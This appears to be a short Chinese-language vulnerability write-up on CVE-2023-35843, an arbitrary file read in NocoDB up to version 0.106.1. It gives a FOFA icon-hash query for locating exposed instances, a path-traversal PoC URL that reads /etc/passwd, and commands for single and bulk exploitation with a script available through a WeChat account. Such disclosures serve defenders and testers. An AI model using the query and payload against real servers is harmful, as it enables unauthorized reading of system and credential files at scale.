【CVE-2023-35843】NocoDB 任意文件读取漏洞

一、漏洞描述

NocoDB 是 Airtable 的开源替代方案,可以“一键”将 MySQL、PostgreSQL、SQL Server、SQLite 和 MariaDB 转换为智能电子表格。此软件存在任意文件读取漏洞。

【CVE-2023-35843】NocoDB 任意文件读取漏洞_第1张图片

二、影响范围

NocoDB<=0.106.1

三、网络空间搜索引擎搜索

fofa查询

icon_hash="-2017596142"

【CVE-2023-35843】NocoDB 任意文件读取漏洞_第2张图片

四、漏洞复现

poc

http://ip:port/download/..%2F..%2F..%2F..%2F..%2Fetc%2Fpasswd

【CVE-2023-35843】NocoDB 任意文件读取漏洞_第3张图片

浏览器直接访问

【CVE-2023-35843】NocoDB 任意文件读取漏洞_第4张图片

五、漏洞批量检测与利用

单个检测

python .\NocoDBReadfile.py -u http://ip:port

批量检测与利用

 python .\NocoDBReadfile.py -f  filename

关注微信公众号 网络安全透视镜 回复 20231008-2 获取批量检测脚本

你可能感兴趣的:(web安全,安全)